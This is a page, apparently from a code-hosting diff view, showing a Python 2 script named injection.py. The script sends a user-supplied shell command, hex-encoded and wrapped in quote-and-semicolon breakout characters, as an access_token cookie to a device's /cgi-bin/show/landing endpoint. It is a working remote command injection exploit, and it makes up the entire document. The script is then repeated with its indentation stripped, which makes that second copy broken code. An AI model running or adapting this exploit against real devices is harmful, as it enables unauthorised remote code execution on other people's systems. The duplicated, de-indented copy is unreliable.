benjholla · August 29, 2015 14:14
diff --git a/injection.py b/injection.py
 #!/usr/bin/python

 import sys
 import getopt
 import urllib2

 # define hexEncode function
 hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])

 def main(argv):

        # set defaults
        target = None

 	# parse command line options
 	try:
 		opts, args = getopt.getopt(argv, "h", ["help", "target="])
 	except getopt.GetoptError:
 		usage()
 		sys.exit(2)
 	for opt, arg in opts:
 		if opt in ("-h", "--help"):
 			usage()
 			sys.exit()
 		elif opt in ("--target"):
 			target = arg
        
 	if target is None:
 		target = raw_input("Enter target (hostname or IP): ")
 	url = "http://" + target + "/cgi-bin/show/landing"
 	command = raw_input("Enter command to inject: ")
 	encodedCommand = hexEncode("' .; " + command + ";'")
 	# uncomment the hacky line below if you want stderr output in the response 
 	#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")
 
 	opener = urllib2.build_opener()
 	opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
 	response = opener.open(url)
 	content = response.read()
 
 	print "-----------------------------------------------------"
 	print "GET " + url
 	print "Cookie: access_token=" + encodedCommand
 	print "-----------------------------------------------------"
 	print content

 def usage():
 	print "Usage: web-command-injection.py [options] ..."
 	print "Configuration:"
 	print "  --target=<hostname or IP>    Sets the target host."
 	print "Miscellaneous:"
 	print "  -h                           Print usage options."
 	print "\n"

 if __name__ == "__main__":
 	main(sys.argv[1:])
	#!/usr/bin/python

	import sys
	import getopt
	import urllib2

	# define hexEncode function
	hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])

	def main(argv):

	# set defaults
	target = None

	# parse command line options
	try:
	opts, args = getopt.getopt(argv, "h", ["help", "target="])
	except getopt.GetoptError:
	usage()
	sys.exit(2)
	for opt, arg in opts:
	if opt in ("-h", "--help"):
	usage()
	sys.exit()
	elif opt in ("--target"):
	target = arg

	if target is None:
	target = raw_input("Enter target (hostname or IP): ")
	url = "http://" + target + "/cgi-bin/show/landing"
	command = raw_input("Enter command to inject: ")
	encodedCommand = hexEncode("' .; " + command + ";'")
	# uncomment the hacky line below if you want stderr output in the response
	#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")

	opener = urllib2.build_opener()
	opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
	response = opener.open(url)
	content = response.read()

	print "-----------------------------------------------------"
	print "GET " + url
	print "Cookie: access_token=" + encodedCommand
	print "-----------------------------------------------------"
	print content

	def usage():
	print "Usage: web-command-injection.py [options] ..."
	print "Configuration:"
	print " --target=<hostname or IP> Sets the target host."
	print "Miscellaneous:"
	print " -h Print usage options."
	print "\n"

	if __name__ == "__main__":
	main(sys.argv[1:])